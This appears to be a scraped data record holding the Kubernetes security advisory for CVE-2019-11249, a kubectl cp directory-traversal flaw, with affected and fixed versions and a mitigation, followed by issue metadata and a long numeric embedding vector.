"operator": null } ]
https://github.com/kubernetes/kubernetes/issues/80984
[ "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
[CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N) A third issue was discovered with the Kubernetes `kubectl cp` command that could enable a directory traversal such that a malicious container could replace or create files on a user’s workstation. The vulnerability is a client-side defect and requires user interaction to be exploited. **Vulnerable versions:** Kubernetes 1.0.x-1.12.x Kubernetes 1.13.0-1.13.8 Kubernetes 1.14.0-1.14.4 Kubernetes 1.15.0-1.15.1 **Vulnerable configurations:** All `kubectl` clients running a vulnerable version and using the `cp` operation. **Vulnerability impact:** A malicious user can potentially create or overwrite files outside of the destination directory of the `kubectl cp` operation. **Mitigations prior to upgrading:** Avoid using `kubectl cp` with any untrusted workloads. **Fixed versions:** Fixed in v1.13.9 by #80871 Fixed in v1.14.5 by #80870 Fixed in v1.15.2 by #80869 Fixed in master by #80436 **Fix impact:** The `kubectl cp` function is prevented from creating or modifying files outside the destination directory. **Acknowledgements:** This issue was discovered by Yang Yang of Amazon, who also provided a patch. Thanks also to the release managers for creating the security releases.
CVE-2019-11249: Incomplete fixes for CVE-2019-1002101 and CVE-2019-11246, kubectl cp potential directory traversal
https://api.github.com/repos/kubernetes/kubernetes/issues/80984/comments
3
2019-08-05T12:44:23
2022-05-16T21:57:50Z
https://github.com/kubernetes/kubernetes/issues/80984
476,838,777
80,984
true
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : CVE-2019-11249: Incomplete fixes for CVE-2019-1002101 and CVE-2019-11246, kubectl cp potential directory traversal Issue date: --- start body --- [CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N) A third issue was discovered with the Kubernetes `kubectl cp` command that could enable a directory traversal such that a malicious container could replace or create files on a user’s workstation. The vulnerability is a client-side defect and requires user interaction to be exploited. **Vulnerable versions:** Kubernetes 1.0.x-1.12.x Kubernetes 1.13.0-1.13.8 Kubernetes 1.14.0-1.14.4 Kubernetes 1.15.0-1.15.1 **Vulnerable configurations:** All `kubectl` clients running a vulnerable version and using the `cp` operation. **Vulnerability impact:** A malicious user can potentially create or overwrite files outside of the destination directory of the `kubectl cp` operation. **Mitigations prior to upgrading:** Avoid using `kubectl cp` with any untrusted workloads. **Fixed versions:** Fixed in v1.13.9 by #80871 Fixed in v1.14.5 by #80870 Fixed in v1.15.2 by #80869 Fixed in master by #80436 **Fix impact:** The `kubectl cp` function is prevented from creating or modifying files outside the destination directory. **Acknowledgements:** This issue was discovered by Yang Yang of Amazon, who also provided a patch. Thanks also to the release managers for creating the security releases. --- end body ---
1,593
[ -0.02662755362689495, -0.0188327357172966, -0.011251279152929783, 0.005152687430381775, 0.012389209121465683, -0.018263770267367363, -0.012958173640072346, 0.038348227739334106, 0.015888342633843422, 0.008043739944696426, -0.008178869262337685, -0.01685558259487152, -0.01081033144146204, 0.0004393919662106782, -0.0023274216800928116, 0.04597235843539238, -0.018519803881645203, 0.0008712273556739092, -0.008498911745846272, -0.019117217510938644, 0.0024429927580058575, -0.046000804752111435, -0.027367208153009415, 0.047167181968688965, 0.026755569502711296, 0.0018544696504250169, 0.011080590076744556, 0.010724986903369427, -0.037494782358407974, 0.023654712364077568, 0.012495889328420162, 0.004398809280246496, -0.004882429260760546, 0.004427257459610701, 0.05408010631799698, 0.009089212864637375, 0.006980487145483494, 0.034962888807058334, -0.04381028935313225, -0.04233098402619362, -0.036982711404561996, -0.06122061237692833, 0.013484465889632702, 0.025688761845231056, -0.017637908458709717, 0.012410544790327549, -0.012815932743251324, -0.010291150771081448, -0.019657734781503677, 0.03109392710030079, -0.014409033581614494, -0.06508957594633102, -0.022516783326864243, -0.0642930269241333, 0.028391344472765923, -0.00666044419631362, 0.028277551755309105, 0.022815488278865814, 0.018448684364557266, 0.017709029838442802, 0.003979197703301907, 0.014131663367152214, -0.010895675979554653, 0.02172023244202137, 0.0028857183642685413, 0.016542652621865273, -0.031463753432035446, 0.022246524691581726, -0.04611459746956825, -0.025205140933394432, 0.0010765880579128861, 0.002455438720062375, 0.016770238056778908, -0.03132151439785957, 0.009302575141191483, -0.03464995697140694, 0.037807710468769073, 0.04981286823749542, -0.008456239476799965, 0.013086190447211266, -0.017552563920617104, 0.001018802635371685, -0.029088325798511505, 0.0020820556674152613, 0.02282971329987049, -0.01235364843159914, -0.04887407645583153, -0.06764991581439972, 0.006329733412712812, -0.008413567207753658, -0.010262702591717243, 0.013811620883643627, 0.01142196822911501, -0.030667204409837723, 0.01859092526137829, 0.0001189047543448396, -0.021706007421016693, -0.004882429260760546, -0.04750856012105942, 0.0002033604687312618, -0.02637152001261711, 0.008562920615077019, -0.025276262313127518, -0.01205494161695242, 0.02800729312002659, -0.017154289409518242, 0.01859092526137829, 0.03072410076856613, -0.004875317215919495, 0.10838779807090759, 0.024579279124736786, 0.004441481549292803, -0.05763613432645798, -0.0039720856584608555, -0.03245944157242775, 0.012872829101979733, -0.00520247220993042, -0.001721118576824665, -0.024038763716816902, -0.03706805780529976, -0.006674668285995722, 0.005376717541366816, -0.010625418275594711, -0.012111838907003403, -0.02247411012649536, 0.016016360372304916, 0.018718942999839783, 0.016841357573866844, -0.021905144676566124, -0.01766635663807392, -0.03501978516578674, 0.017438771203160286, -0.02339867874979973, 0.0004956217017024755, -0.0012632797006517649, -0.0051242392510175705, 0.02349824644625187, 0.029586169868707657, -0.013441793620586395, 0.005358937196433544, -0.0366697832942009, -0.021193940192461014, 0.020937904715538025, 0.03792150318622589, -0.021336181089282036, -0.0016348848585039377, 0.00020825001411139965, -0.014793084934353828, -0.01604480855166912, 0.010867227800190449, -0.00876205787062645, -0.023811178281903267, 0.02891763672232628, 0.01610170491039753, 0.07635507732629776, -0.014764636754989624, 0.012168735265731812, 0.04039650037884712, -0.01630084216594696, -0.020795663818717003, 0.03575943782925606, -0.008520248346030712, 0.02405298687517643, -0.023171091452240944, 0.02166333608329296, -0.002147842198610306, -0.011770459823310375, -0.005935014225542545, -0.03134996071457863, 0.025702985003590584, 0.020980577915906906, 0.0024607728701084852, 0.026243502274155617, -0.017182737588882446, -0.03740943595767021, -0.03336978703737259, 0.029301688075065613, 0.013384897261857986, 0.017893943935632706, -0.011976709589362144, -0.009857315570116043, -0.000018655267922440544, -0.045545633882284164, -0.013520026579499245, 0.04494822025299072, -0.052686139941215515, -0.017950840294361115, 0.01243188139051199, -0.014778860844671726, -0.038405124098062515, -0.013278216123580933, -0.017040496692061424, 0.01110903825610876, -0.020539630204439163, -0.009409255348145962, 0.049386147409677505, 0.008534472435712814, -0.01110903825610876, 0.04935769736766815, 0.006824021693319082, 0.003267991589382291, 0.0007916612084954977, -0.039770640432834625, 0.020184027031064034, -0.022104283794760704, 0.024934882298111916, -0.002524781273677945, 0.0024696628097444773, 0.021336181089282036, -0.04375339299440384, -0.03758012503385544, -0.008939859457314014, 0.03857581317424774, -0.008875851519405842, 0.017936615273356438, 0.009757746942341328, 0.02834867127239704, 0.043668050318956375, -0.06656888127326965, 0.006973375100642443, 0.008321110159158707, -0.016926703974604607, 0.039571501314640045, -0.0028234878554940224, -0.046000804752111435, -0.0024341025855392218, 0.007673913147300482, 0.004900209605693817, -0.006952038966119289, -0.018562477082014084, 0.03777926415205002, -0.010860116221010685, -0.009195894002914429, -0.0021656223107129335, 0.016215497627854347, -0.028377119451761246, -0.0009530160459689796, 0.017196960747241974, -0.015347826294600964, 0.002869716379791498, 0.028163759037852287, -0.018093081191182137, -0.013989422470331192, -0.017709029838442802, 0.009615505114197731, 0.018946528434753418, -0.02708272449672222, 0.06708095222711563, -0.015916790813207626, -0.014849981293082237, -0.010369383729994297, 0.047622356563806534, 0.007858826778829098, -0.005046006757766008, -0.0029906213749200106, -0.031065478920936584, -0.0028519360348582268, 0.0004118327342439443, -0.006464862730354071, -0.009437703527510166, 0.027367208153009415, 0.011101925745606422, -0.022004714235663414, 0.004637063015252352, 0.018263770267367363, -0.025887899100780487, -0.038006849586963654, 0.01696937531232834, -0.02039738930761814, -0.009729298762977123, 0.01918833889067173, -0.01568920537829399, -0.02967151440680027, -0.004260124173015356, -0.01376894861459732, -0.0324878916144371, 0.021734455600380898, 0.031122375279664993, 0.013918302021920681, -0.0010356938000768423, 0.01032671146094799, 0.005970574449747801, -0.016642220318317413, 0.011813132092356682, -0.013349336571991444, -0.021691784262657166, -0.021535318344831467, -0.04116460308432579, 0.01817842572927475, 0.01473618857562542, -0.009999556466937065, 0.002656354568898678, -0.037693917751312256, 0.00997110828757286, -0.0033213321585208178, 0.01298662181943655, 0.008214429952204227, 0.04381028935313225, -0.03558874875307083, 0.005284260492771864, -0.037494782358407974, 0.02405298687517643, -0.012218519113957882, 0.018747391179203987, 0.01103791780769825, 0.04486287385225296, 0.006543095223605633, 0.044635288417339325, -0.054193899035453796, -0.014152999967336655, 0.024693073704838753, -0.03752322867512703, -0.011585545726120472, -0.029088325798511505, 0.008036628365516663, 0.002796817570924759, 0.029002981260418892, -0.026926260441541672, -0.02445126324892044, 0.00975063443183899, -0.008157532662153244, 0.020639197900891304, -0.0227301437407732, 0.01108770165592432, -0.005735876504331827, -0.037039607763290405, -0.01584566943347454, -0.0072151850908994675, -0.05271458998322487, -0.02981375716626644, 0.011777571402490139, 0.011372184380888939, -0.01869049482047558, -0.004565942566841841, -0.05609992891550064, -0.02041161246597767, -0.02201893739402294, 0.008349558338522911, 0.054962001740932465, 0.014145887456834316, 0.00624083261936903, 0.011414856649935246, 0.007986843585968018, 0.024437038227915764, -0.007016047369688749, -0.030098238959908485, 0.015276704914867878, -0.021834025159478188, 0.024821089580655098, -0.0030617418233305216, 0.000829444034025073, 0.02967151440680027, -0.02130773290991783, -0.0014801975339651108, 0.03382495790719986, -0.015319377183914185, -0.009928436018526554, 0.0018935860134661198, 0.03558874875307083, -0.01440192200243473, 0.02854781039059162, -0.07288439571857452, -0.006098591722548008, 0.03291461616754532, -0.00024269905406981707, 0.002261635148897767, 0.0010979243088513613, 0.019302131608128548, -0.01736765168607235, -0.032943062484264374, -0.01614437624812126, 0.022744368761777878, 0.027808155864477158, 0.05644131079316139, -0.018846958875656128, -0.024920659139752388, -0.03382495790719986, 0.01073209848254919, -0.016343513503670692, 0.02051118202507496, -0.02800729312002659, 0.006109259556978941, 0.027609016746282578, -0.039258573204278946, 0.01187002845108509, 0.04935769736766815, 0.0071013919077813625, 0.010845892131328583, -0.004871761426329613, -0.0022883054334670305, -0.05143442004919052, 0.06070854514837265, -0.03900253772735596, -0.00576076889410615, -0.02571721002459526, 0.0082784378901124, -0.038462020456790924, -0.009843091480433941, 0.017538340762257576, -0.0064684185199439526, 0.02755212038755417, -0.0006614216254092753, 0.020013337954878807, 0.044635288417339325, -0.00934524741023779, 0.01873316615819931, 0.0033551144879311323, -0.019828423857688904, -0.012410544790327549, -0.011073477566242218, 0.01131528802216053, 0.016528427600860596, -0.02193359285593033, -0.015418946743011475, 0.061846476048231125, 0.03817753866314888, 0.04298529028892517, 0.026399968191981316, -0.018875407055020332, 0.01025559101253748, -0.00009395697998115793, -0.007617016322910786, 0.0516335554420948, -0.0010401387698948383, 0.027921948581933975, 0.021748680621385574, 0.023626264184713364, 0.024337470531463623, 0.035617198795080185, -0.011549985967576504, 0.005778548773378134, 0.010212918743491173, 0.018206873908638954, -0.006984042935073376, -0.042359430342912674, -0.023782730102539062, -0.002741699106991291, -0.06827577948570251, 0.028590481728315353, 0.010113349184393883, -0.036527540534734726, 0.026599105447530746, -0.010596970096230507, 0.010006668977439404, -0.05117838457226753, -0.01817842572927475, -0.05123528093099594, -0.019515493884682655, -0.030667204409837723, -0.047110285609960556, -0.04082322493195534, 0.028732722625136375, 0.010689426213502884, 0.010796107351779938, -0.009722186252474785, -0.0109596848487854, -0.000029142778657842427, -0.04617149382829666, 0.024579279124736786, 0.009779082611203194, 0.010184470564126968, 0.017296530306339264, -0.02292928285896778, 0.00604880740866065, 0.003118638414889574, -0.012823044322431087, 0.0013406233629211783, -0.049443043768405914, 0.02029781974852085, -0.02374005690217018, 0.029387032613158226, 0.04102236405014992, 0.033398233354091644, 0.02856203354895115, -0.034251682460308075, 0.02071031928062439, 0.03482064604759216, -0.01066097803413868, -0.027481000870466232, 0.004285016097128391, -0.02146419696509838, -0.006674668285995722, 0.005803441163152456, -0.009437703527510166, 0.016741789877414703, -0.06992577761411667, -0.01425256859511137, -0.01877583935856819, -0.05484820902347565, -0.001115704420953989, 0.048077527433633804, 0.0064506386406719685, 0.003125750459730625, -0.011101925745606422, 0.00001299478935834486, -0.009515936486423016, -0.014537051320075989, -0.027424104511737823, 0.06144820153713226, -0.022659024223685265, 0.009814643301069736, 0.00893274787813425, 0.024437038227915764, -0.027125397697091103, 0.0009859093697741628, -0.024138331413269043, -0.03336978703737259, 0.02947237715125084, -0.0046228389255702496, -0.00906076468527317, -0.041847363114356995, 0.015376274473965168, 0.025276262313127518, -0.04634218290448189, 0.008726498112082481, -0.0043596928007900715, 0.04312753304839134, 0.00273458706215024, 0.0074178786017000675, 0.005355381406843662, -0.02775125950574875, -0.04045339673757553, 0.013591147027909756, -0.008847402408719063, 0.016670668497681618, -0.0016971153672784567, 0.017993511632084846, 0.008207317441701889, -0.0008752279100008309, -0.030553409829735756, 0.017396099865436554, -0.007745033595710993, -0.02713962085545063, 0.011557097546756268, 0.007986843585968018, -0.005230920389294624, -0.010981020517647266, -0.02870427444577217, -0.03109392710030079, 0.0078730508685112, -0.0012766148429363966, 0.02177712880074978, -0.05052407458424568, -0.00906076468527317, -0.030098238959908485, 0.012339424341917038, -0.010781883262097836, 0.01787971891462803, 0.035275816917419434, -0.026399968191981316, 0.008548696525394917, -0.01691247895359993, 0.014622395858168602, 0.0301835834980011, -0.008257102221250534, 0.010966796427965164, 0.024835314601659775, 0.028064189478754997, 0.025276262313127518, -0.01590256579220295, -0.01584566943347454, 0.006621328182518482, 0.002115837996825576, -0.02399609051644802, -0.004345468711107969, -0.01908876933157444, -0.0012961729662492871, 0.008669601753354073, -0.03553185239434242, 0.011692226864397526, 0.012310976162552834, -0.011123262345790863, 0.00820020493119955, 0.0009485710179433227, -0.017694804817438126, 0.01776592619717121, -0.007638352457433939, 0.0023967642337083817, -0.009530160576105118, -0.00743210269138217, -0.005323376972228289, -0.006912922486662865, -0.004413033369928598, -0.003698271233588457, 0.026926260441541672, 0.005967018660157919, 0.01787971891462803, 0.011806019581854343, -0.00427790405228734, -0.005110015161335468, -0.024479711428284645, 0.026954708620905876, 0.0258167777210474, -0.004445037804543972, 0.016315065324306488, 0.0011174824321642518, 0.02876117080450058, -0.013335112482309341, 0.015760324895381927, -0.013712052255868912, 0.006678224541246891, 0.018406011164188385, 0.0036947152111679316, -0.015916790813207626, -0.001563764177262783, 0.044379256665706635, 0.007197404745966196, 0.01207627821713686, -0.008698049932718277, 0.026456864550709724, 0.01243188139051199, -0.012012269347906113, 0.013726276345551014, -0.015561187639832497, 0.008242878131568432, 0.0035098018124699593, 0.004669067449867725, 0.040993914008140564, -0.014437481760978699, -0.006550207268446684, 0.005188248120248318, -0.02005600929260254, -0.007560119964182377, -0.010134685784578323, 0.01222563162446022, -0.006877362262457609, 0.012268303893506527, 0.0027754814364016056, 0.0038476246409118176, 0.01486420538276434, 0.007147620432078838, -0.014665068127214909, -0.004014757927507162, -0.020738767459988594, -0.05894475430250168, 0.019856872037053108, 0.026414191350340843, -0.007787705864757299, -0.04261546581983566, 0.0167133416980505, -0.01695515215396881, -0.002700804965570569, -0.016187049448490143, 0.05396631360054016, -0.01813575252890587, -0.011578434146940708, 0.0013023960636928678, 0.006792017258703709, 0.004068098496645689, 0.015774549916386604, -0.01928790658712387, -0.011763347312808037, -0.034962888807058334, 0.031520649790763855, 0.019885320216417313, -0.00800106767565012, 0.008313998579978943, 0.03985598683357239, -0.01131528802216053, -0.01984264701604843, -0.006973375100642443, -0.04045339673757553, -0.02096635289490223, 0.0020589414052665234, -0.004626395180821419, -0.014003646560013294, -0.026456864550709724, -0.014281016774475574, -0.024394366890192032, 0.029330136254429817, 0.0003098191227763891, -0.02203316241502762, -0.02854781039059162, 0.0012881718575954437, 0.00199493276886642, 0.010234254412353039, 0.007809041999280453, -0.0068382457830011845, -0.008477576076984406, -0.01766635663807392, -0.005117127206176519, 0.0009805753361433744, -0.010703650303184986, 0.03109392710030079, 0.014316577464342117, 0.0008134418749250472, 0.033028408885002136, -0.03755167871713638, -0.000776103581301868, 0.029785307124257088, 0.004395253024995327, -0.02201893739402294, -0.021378852427005768, -0.00260123610496521, 0.01863359846174717, -0.03078099712729454, 0.0021531761158257723, -0.0018793619237840176, 0.009764858521521091, -0.007553007919341326, -0.01711161620914936, 0.021449973806738853, -0.01940169930458069, 0.055161137133836746, -0.007076499983668327, 0.032231856137514114, 0.0025496736634522676, 0.010561409406363964, 0.006923590786755085, 0.010774770751595497, -0.006781349424272776, -0.010006668977439404, 0.003111526370048523, 0.037693917751312256, -0.01040494441986084, -0.02187669649720192, 0.0038547366857528687, 0.012979510240256786, -0.023924970999360085, 0.009956884197890759, -0.009160333313047886, 0.0016873362474143505, -0.024579279124736786, -0.013164423406124115, -0.03721030056476593, -0.004242343828082085, 0.008477576076984406, -0.028320223093032837, -0.0014570832718163729, 0.017751703038811684, -0.010717874392867088, -0.0259732436388731, 0.025902122259140015, 0.01721118576824665, -0.022246524691581726, 0.009402143768966198, 0.0023967642337083817, -0.015987912192940712, 0.02405298687517643, -0.004658399615436792, 0.009793306700885296, -0.03043961711227894, 0.028135310858488083, -0.03914478048682213, 0.018861183896660805, 0.003993421792984009, 0.02339867874979973, 0.0006747567094862461, 0.012951061129570007, 0.016514204442501068, 0.023768505081534386, -0.013776060193777084, 0.003365782555192709, -0.032174959778785706, 0.010717874392867088, -0.005494066514074802, 0.003552474081516266, 0.02156376652419567, 0.046000804752111435, -0.003219985170289874, 0.018363339826464653, 0.02536160685122013, -0.005334045272320509, 0.006087923422455788, 0.01395386178046465, -0.022815488278865814, 0.009096325375139713, 0.0004800640745088458, 0.0014499712269753218, -0.004971330054104328, -0.016642220318317413, -0.0019878207240253687, 0.01750989258289337, 0.024323245510458946, 0.00350624555721879, -0.025503847748041153, 0.004750856198370457, -0.014259681105613708, 0.01030537486076355, 0.0018420235719531775, -0.030894789844751358, -0.018007736653089523, -0.008306886069476604, 0.010561409406363964, -0.004775748588144779, 0.0028003735933452845, 0.021492645144462585, -0.008662489242851734, -0.005568743217736483, 0.03317064791917801, -0.023981867358088493, -0.009331023320555687, 0.029330136254429817, -0.028633154928684235, 0.01970040611922741, -0.006674668285995722, -0.0018900299910455942, 0.002571009797975421, 0.008726498112082481, -0.014366361312568188, 0.021905144676566124, -0.0020216030534356833, -0.007211628835648298, -0.0012632797006517649, -0.006927146576344967, 0.0129083888605237, -0.0015610972186550498, 0.01009912509471178, 0.009572832845151424, -0.003815620206296444, -0.025546520948410034, -0.008235765621066093, -0.009430591948330402, 0.04261546581983566, -0.028234878554940224, -0.010412055999040604, 0.009067876264452934, 0.013569810427725315, 0.006507534999400377, 0.01750989258289337, -0.012467441149055958, -0.006831133738160133, 0.005038894712924957, 0.003554251976311207, 0.015020671300590038, -0.0003827177279163152, -0.01903187297284603, -0.008847402408719063, 0.039628397673368454, -0.010568520985543728, 0.0038049521390348673, -0.0035773662384599447, -0.005312709137797356, 0.009316799230873585, -0.025347381830215454, 0.01914566569030285, 0.023156868293881416, -0.009053652174770832, -0.0036876031663268805, 0.01695515215396881, 0.004402365069836378, -0.008698049932718277, -0.012652355246245861, -0.020141353830695152, -0.00028581591323018074, -0.006930702831596136, -0.03945770859718323, -0.022360317409038544, 0.00005878562296857126, -0.005358937196433544, 0.012545674107968807, -0.0175241157412529, -0.003358670510351658, 0.014515714719891548, -0.01278748456388712, -0.021151266992092133, -0.007766369730234146, 0.003808508161455393, 0.01002800464630127, -0.0034546831157058477, -0.018320666626095772, 0.01924523524940014, -0.014160111546516418, 0.00336756044998765, 0.012815932743251324, 0.019458597525954247, 0.00455883052200079, -0.02901720628142357, -0.01807885617017746, 0.01954394206404686, -0.044834427535533905, -0.01448015496134758, -0.0024998891167342663, -0.004594390746206045, 0.0036804911214858294, -0.018519803881645203, -0.003205761080607772, -0.017780151218175888, 0.0005805219407193363, 0.009473264217376709, -0.01869049482047558, 0.007638352457433939, -0.004270792007446289, 0.01903187297284603, 0.007816154509782791, -0.018420236185193062, 0.03402409702539444, -0.03433702513575554, 0.04187580943107605, -0.012616794556379318, -0.008121972903609276, -0.0014953106874600053, -0.025446951389312744, -0.042814601212739944, 0.019074546173214912, 0.023569367825984955, -0.005223808344453573, -0.017808599397540092, -0.05316976085305214, -0.00926701445132494, -0.0011983821168541908, -0.012510113418102264, -0.015475843101739883, -0.015817221254110336, -0.020212475210428238, -0.004384585190564394, 0.021279284730553627, -0.0136409318074584, -0.0017042274121195078, 0.010668090544641018, 0.022772816941142082, -0.029443928971886635, -0.03857581317424774, 0.007389430422335863, -0.03132151439785957, 0.01164955459535122, -0.045488737523555756, 0.004384585190564394, -0.008662489242851734, -0.0003098191227763891, 0.0010019114706665277, 0.016187049448490143, -0.03578788787126541, 0.025091348215937614, 0.00745343929156661, -0.034507714211940765, 0.009302575141191483, 0.010753435082733631, -0.009459040127694607, -0.006575099658221006, -0.03032582439482212, -0.012118950486183167, -0.0068986983969807625, 0.01813575252890587, -0.0017193405656144023, -0.015376274473965168, -0.0564982071518898, 0.016115928068757057, 0.0016144376713782549, -0.06247233599424362, -0.012005157768726349, 0.008264213800430298, 0.0011832689633592963, -0.03746633231639862, 0.0227301437407732, 0.025987468659877777, 0.03826288506388664, -0.005931457970291376, -0.011258391663432121, 0.007069387938827276, -0.016926703974604607, -0.005085123237222433, 0.018974976614117622, 0.015859894454479218, 0.014515714719891548, 0.0037942840717732906, -0.02567453682422638, -0.012168735265731812, -0.013790284283459187, -0.02789350040256977, -0.0067671253345906734, -0.0060203587636351585, 0.0017913501942530274, 0.005195360165089369, 0.012417657300829887, 0.017282307147979736, -0.024081435054540634, 0.01187002845108509, 0.02187669649720192, 0.010653866454958916, 0.017097393050789833, -0.0035489180590957403, -0.00541583402082324, 0.04016891494393349, 0.008420678786933422, 0.02506290003657341, 0.0003818287223111838, -0.01503489539027214, 0.012979510240256786, -0.029955998063087463, 0.03058185800909996, -0.003783616004511714, 0.030041342601180077, 0.001799351186491549, 0.006183936260640621, -0.013633819296956062, -0.020923681557178497, 0.04167667403817177, -0.015376274473965168, -0.004473485983908176, 0.012567010708153248, -0.00730408588424325, -0.0018064632313326001, -0.05208873003721237, 0.01960083842277527, -0.037893056869506836, 0.006311953533440828, -0.024821089580655098, -0.0186762697994709, -0.015788773074746132, -0.029899101704359055, 0.031264618039131165, 0.025788329541683197, 0.017751703038811684, 0.01361959520727396, 0.0031613106839358807, 0.049699075520038605, -0.00812908448278904, -0.0015024227323010564, -0.039912883192300797, -0.03186202794313431, -0.00470818392932415, 0.0164004098623991, -0.00946615170687437, 0.003634262830018997, -0.009736410342156887, 0.0033017739187926054, 0.010653866454958916, 0.003915189299732447, 0.016286617144942284, -0.029586169868707657, -0.010120461694896221, -0.021990489214658737, -0.004477041773498058, 0.010845892131328583, 0.01827799528837204, -0.03251633793115616, 0.005412277765572071, 0.006792017258703709, 0.020881008356809616, -0.007759257685393095, 0.009402143768966198, 0.02972841076552868, -0.018064633011817932, 0.01334222499281168, -0.025077125057578087, 0.020326267927885056, -0.012268303893506527, -0.0186762697994709, 0.020781440660357475, 0.04344046488404274, 0.01490687858313322, -0.05331200361251831, -0.020824111998081207, -0.006539539434015751, 0.010853003710508347, 0.00751744769513607, -0.020383164286613464, -0.01496377494186163, -0.050609420984983444, 0.003940081223845482, -0.009850203059613705, 0.029074102640151978, -0.013157310895621777, -0.022459885105490685, -0.0017842381494119763, -0.012040717527270317, -0.0005467396113090217, -0.018875407055020332, -0.02130773290991783, -0.004768636543303728, 0.012759036384522915, -0.0021193940192461014, -0.01615860126912594, -0.0049286577850580215, -0.012261191383004189, 0.008249989710748196, 0.0006267502903938293, 0.017296530306339264, -0.006155488081276417, 0.01174201164394617, 0.01496377494186163, -0.010184470564126968, -0.022090058773756027, 0.00855580810457468, -0.0005476286169141531, 0.019728854298591614, -0.015134464018046856, -0.03109392710030079, -0.007958395406603813, 0.013818732462823391, -0.003659154986962676, -0.010717874392867088, 0.01721118576824665, -0.0363568514585495, -0.00639374228194356, -0.010568520985543728, 0.005014002323150635, 0.01334222499281168, 0.002298973500728607, -0.02678401954472065, -0.006191048305481672, -0.027452552691102028, -0.0279077235609293, -0.023725831881165504, -0.018918080255389214, 0.009103436954319477, 0.07407921552658081, -0.0018793619237840176, -0.009224342182278633, 0.003182646818459034, 0.029088325798511505, 0.002122950041666627, 0.01948704570531845, -0.004320576786994934, 0.009103436954319477, -0.0037942840717732906, 0.01813575252890587, -0.0049215457402169704, 0.021037474274635315, 0.007901499047875404, 0.0009432369843125343, -0.0012286084238439798, 0.005689647980034351, -0.02866160310804844, 0.018036184832453728, -0.007065831683576107, -0.03934391587972641, 0.0067742373794317245, -0.023014627397060394, 0.0029230567160993814, 0.00012768369924742728, -0.008385119028389454, 0.0009663511882536113, -0.01817842572927475, -0.0018775839125737548, -0.011990933679044247, 0.01590256579220295, -0.023156868293881416, 0.0107889948412776, -0.019615061581134796, 0.011286839842796326, 0.014444594271481037, 0.003908077254891396, -0.04947149008512497, -0.006927146576344967, -0.01600213535130024, 0.00812908448278904, 0.019785750657320023, -0.007695249281823635, 0.020027561113238335, -0.006514647044241428, -0.01354136224836111, -0.00017769038095138967, 0.01222563162446022, -0.009074988774955273, -0.009309686720371246, 0.008996755816042423, -0.006891586352139711, 0.004437925759702921, 0.01659954898059368, -0.011059253476560116, 0.019316354766488075, -0.014096103608608246, -0.012673690915107727, -0.026442639529705048, 0.004501934163272381, -0.004345468711107969, -0.010774770751595497, -0.0021407301537692547, 0.009373695589601994, -0.011756235733628273, 0.007296973839402199, -0.0019362583989277482, -0.00260123610496521, 0.005913678091019392, 0.020482733845710754, 0.05109304189682007, -0.011806019581854343, -0.003922301344573498, -0.008904299698770046, -0.011585545726120472, 0.0269404835999012, 0.007652576547116041, 0.006941370666027069, 0.007222297135740519, -0.021492645144462585, -0.011628217995166779, 0.007844602689146996, -0.020696094259619713, 0.0013619594974443316, -0.0003936080902349204, 0.008527359925210476, -0.02617238089442253, 0.011912700720131397, 0.03220340982079506, -0.00420322734862566, -0.005284260492771864, 0.04895942285656929, 0.023782730102539062, 0.012460329569876194, -0.005252256523817778, 0.008164645172655582, -0.005145575385540724, -0.0055616311728954315, -0.027224967256188393, -0.024024538695812225, -0.006738677155226469, 0.0015948795480653644, 0.020994801074266434, 0.02591634728014469, -0.026556432247161865, 0.014721964485943317, 0.019686182960867882, 0.008321110159158707, -0.004199671559035778, 0.014465929940342903, -0.0321180634200573, 0.00280926376581192, 0.008690937422215939, -0.02308574691414833, -0.006934258621186018, 0.008107748813927174, -0.0013477354077622294, 0.017694804817438126, 0.003088412107899785, -0.011208606883883476, -0.021791351959109306, -0.022545231506228447, 0.025290485471487045, -0.012246967293322086, 0.034109439700841904, 0.0016339957946911454, -0.025276262313127518, -0.00688447430729866, 0.019814198836684227, 0.019615061581134796, 0.023455575108528137, 0.013612483628094196, 0.016741789877414703, 0.006525315344333649, 0.0012668357230722904, 0.005241588223725557, 0.007268525660037994, 0.022203851491212845, 0.008541584014892578, -0.025276262313127518, -0.020525405183434486, 0.03285771980881691, -0.02035471610724926, 0.001575321308337152, 0.0032768817618489265, -0.01776592619717121, -0.016215497627854347, 0.007069387938827276, 0.03376806154847145, -0.02338445372879505, -0.004096546676009893, -0.028946084901690483, 0.022971954196691513, 0.0032519896049052477, -0.0279077235609293, -0.021179715171456337, 0.008925635367631912, -0.0020802775397896767, 0.030212031677365303, -0.0049322135746479034, 0.01756678894162178, 0.005426501855254173, -0.008591368794441223, 0.012929725460708141, -0.008918523788452148, 0.017282307147979736, -0.0206107497215271, -0.054905105382204056, -0.01938747614622116, -0.015376274473965168, 0.0074605513364076614, 0.017609460279345512, -0.004445037804543972, 0.013633819296956062, 0.002995955292135477, 0.027068501338362694, -0.01741032302379608, 0.01615860126912594, 0.03945770859718323, -0.0005209583905525506, -0.01908876933157444, 0.007250745315104723, -0.018050407990813255, 0.0016206607688218355, 0.006247944664210081, -0.008342446759343147, -0.006685336586087942, 0.011578434146940708, -0.027381431311368942, 0.011101925745606422, 0.010248478502035141, 0.024479711428284645, -0.02844824083149433, -0.006603547837585211, 0.013818732462823391, 0.017154289409518242, -0.03641374781727791, -0.010170246474444866, -0.004519714042544365, 0.007353870198130608, -0.0007494333549402654, -0.009764858521521091, -0.009615505114197731, -0.00469751562923193, 0.01999911293387413, -0.04856114834547043, -0.006756457034498453, -0.02405298687517643, 0.013754724524915218, 0.021478421986103058, 0.01467929221689701, -0.007937058806419373, 0.007666801102459431, -0.008306886069476604, 0.006628440227359533, -0.000961017154622823, -0.012936837039887905, -0.013235543854534626, 0.015120239928364754, -0.04363960027694702, -0.002044717315584421, 0.017751703038811684, -0.005326933227479458, -0.0030368496663868427, 0.03336978703737259, 0.00660710409283638, 0.02142152562737465, -0.028647378087043762, 0.0207672156393528, -0.003155976766720414, 0.0038013961166143417, -0.005959906615316868, 0.008790506049990654, -0.009629729203879833, 0.0017042274121195078, -0.0067742373794317245, 0.02247411012649536, 0.012815932743251324, -0.010163133963942528, 0.005771436728537083, 